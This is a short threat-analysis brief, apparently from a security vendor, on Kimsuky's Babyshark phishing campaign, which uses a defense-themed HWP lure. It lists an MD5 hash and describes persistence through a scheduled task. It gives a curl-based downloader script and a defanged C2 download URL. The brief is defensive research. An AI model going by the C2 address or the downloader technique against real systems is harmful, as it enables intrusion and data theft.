Resources
  • Research
  • Threat Analysis Brief Reports
Quick Overview of Babyshark Campaign disguise as Defense-themed HWP Document, involving the Kimsuky APT Group
2025.01.22

✅ Report Title:


Quick Overview of Babyshark Campaign disguise as Defense-themed HWP Document, involving the Kimsuky APT Group


*What is Babyshark?


Babyshark is a type of malware used by Kimsuky, a North Korean-backed APT group that poses a threat to international security. Since at least 2019, this malware has been employed to steal information, primarily distributed through malicious files or links attached to spear-phishing emails.



✅ Executive Summary:


1) Sample Information


On January 13, 2025, a phishing email disguised as a plan for a "Defense Industry Digital Innovation Seminar" was discovered and analyzed.


- Filename: [Original Email] Announcement of the Korean Defense Industry Society’s Defense Industry Digital Innovation Seminar Plan

- MD5: 8a801a356d5a7b3235b920e4d36336d2


2) Malware Behavior and Key Functions


The attached HWP document contains a malicious file embedded as an OLE object. When executed, it drops additional files to maintain persistence and receives malicious payloads from a Command and Control (C2) server.


The dropped file is a Babyshark-type malware, which downloads its final payload only for specified targets. In previous incidents, the final payload was identified as the QuasarRAT malware.


3) Correlation Analysis


The C2 URL format, which uses "comline" as a URL query value, and the VB script execution via the manifest file are consistent with the Babyshark malware attributed to the Kimsuky group.


Additionally, the Windows Task Scheduler name registered to maintain persistence, “TemporaryStatescleanesdfrs,” closely resembles naming patterns observed in previous Babyshark campaigns that used MSC formats.


4) Countermeasures


It is strongly recommended to avoid opening attachments from unverified email sources and to block the execution of unverified objects or hyperlinks within documents to mitigate potential threats.



📌 How Does the Downloaded Payload Operate?


When the hyperlink in the PDF version is clicked, a script named 1212.bat, located in the same path as VBEdit, is executed. This script serves as a simple downloader, utilizing the curl command to fetch additional files from the attacker's hardcoded C2 server and store them locally.


- Download URL: hxxps[:]//www[.]elmer[.]com[.]tr/modules/mod_finder/src/Helper/1212_pprb_all/dksleks?newpa=comline

- Download Path: %AppData%/Microsoft/wis.db


The Babyshark malware verifies the target's IP address to selectively deliver the malicious payload to specific victims. Although the payload path on the C2 server was deleted during the analysis, previous cases involving Babyshark malware have shown the distribution of QuasarRAT. This suggests the possibility of downloading additional malware aimed at remote control or data exfiltration.



✅ Recommended Threat Detection and Mitigation Actions:


- A phishing email disguised as a plan for the "Defense Industry Digital Innovation Seminar" was identified and analyzed on January 13, 2025.


- The HWP document attached to the email contains a malicious file embedded as an OLE object. Upon execution, it drops additional Babyshark-type files to maintain persistence and receive malicious payloads from a C2 server.


- This type of malware downloads its final payload only for specific targets. Historical records show the use of Babyshark malware to distribute QuasarRAT for remote control or data theft.


- Users are strongly advised to avoid opening attachments from unverified email sources. Blocking the execution of unverified objects or hyperlinks in documents by default is essential to preemptively mitigate potential threats.



🧑‍💻 Report Author: S2W TALON (Updated. 2025-01-15)


👉 Contact us: https://s2w.inc/en/contact


*The full report is available upon request and for QUAXAR subscribers.


List